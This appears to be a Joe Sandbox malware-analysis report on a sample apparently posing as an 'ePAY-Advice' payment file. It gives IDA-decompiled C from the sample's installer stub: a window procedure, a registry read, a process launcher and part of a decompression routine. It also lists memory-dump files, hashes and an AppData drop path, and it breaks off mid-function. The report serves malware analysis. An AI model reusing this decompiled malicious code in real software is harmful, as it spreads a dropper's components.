Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79
API String ID: 1892508949-1487347455
Opcode ID: 968e89b15d2aac919f903de6bba5f6269478a98ee1d58aaee2393c89b40cfc34
Instruction ID: 1397d73bc892ae661a741dfecf38a44b6d03d9e6e7f57cd6dcc913c124f66756
Opcode Fuzzy Hash: 968e89b15d2aac919f903de6bba5f6269478a98ee1d58aaee2393c89b40cfc34
Instruction Fuzzy Hash: 59110431608152EBCF217FA55C415BF66B09A96324B28093FE5D2B22E2D63D4E43973F

Uniqueness

Uniqueness Score: -1.00%

Function 00405005 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405005(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x41fcf4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x41fcf4 = _t16;
							E004049DC();
						}
						L11:
						_t9 = CallWindowProcA( *0x41fcfc, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E0040495C(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404055(0x413);
				return 0;
			}

0x00405009
0x00405013
0x0040502f
0x00405051
0x00405054
0x0040505a
0x00405064
0x00405065
0x00405067
0x0040506d
0x0040506d
0x00405077
0x00405085
0x00000000
0x00405085
0x0040503c
0x00405074
0x00405074
0x00000000
0x00405074
0x00405048
0x0040504a
0x00000000
0x0040504a
0x00405019
0x00000000
0x00000000
0x00405020
0x00000000

APIs

IsWindowVisible.USER32 ref: 00405034
CallWindowProcA.USER32 ref: 00405085

Part of subcall function 00404055: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00404067

Strings

, xrefs: 00405015

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
Instruction ID: 5be162d7cd7d71c2ccb341d7130f59d8c0266776e22eb2788f3d6f03133d665e
Opcode Fuzzy Hash: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
Instruction Fuzzy Hash: 2D019A7150060DABDF209F20DC80EAF3A25EB80354F204036FA14792D0C73A8891AEAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405E51 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405E51(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405DF0(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
					_t21 = RegCloseKey(_a20); // executed
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00405e5f
0x00405e61
0x00405e79
0x00405e7e
0x00405e83
0x00405ec0
0x00405ec0
0x00405e85
0x00405e97
0x00405ea2
0x00405ea8
0x00405eb2
0x00000000
0x00000000
0x00405eb2
0x00405ec5

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0041F4E8,?,?,?,00000002,Call,?,00406095,80000002), ref: 00405E97
RegCloseKey.KERNELBASE(?,?,00406095,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0041F4E8), ref: 00405EA2

Strings

Call, xrefs: 00405E54, 00405E88

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 0288708f4d7737bac9a1074e9ca2e73b9ec30620d1184b938b48006dcff2752a
Instruction ID: d4591e39b0d39d961dff3dfa4a9982e28399459fd93e33a5317855cc39530622
Opcode Fuzzy Hash: 0288708f4d7737bac9a1074e9ca2e73b9ec30620d1184b938b48006dcff2752a
Instruction Fuzzy Hash: 92019A72510609ABDF228F20CC09FDB3FA9EF48360F008026FA45A2190D338DA11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405609 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405609(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x421510->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x421510,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405612
0x00405632
0x0040563a
0x0040563f
0x00000000
0x00405645
0x00405649

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 00405632
CloseHandle.KERNEL32(?), ref: 0040563F

Strings

Error launching installer, xrefs: 0040561C

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction ID: 9728a5d5e843408a2f651da6c1778568bac2657747ba6051cf584ee7dfff0d45
Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction Fuzzy Hash: B0E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406A2B Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406A2B() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406E99))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
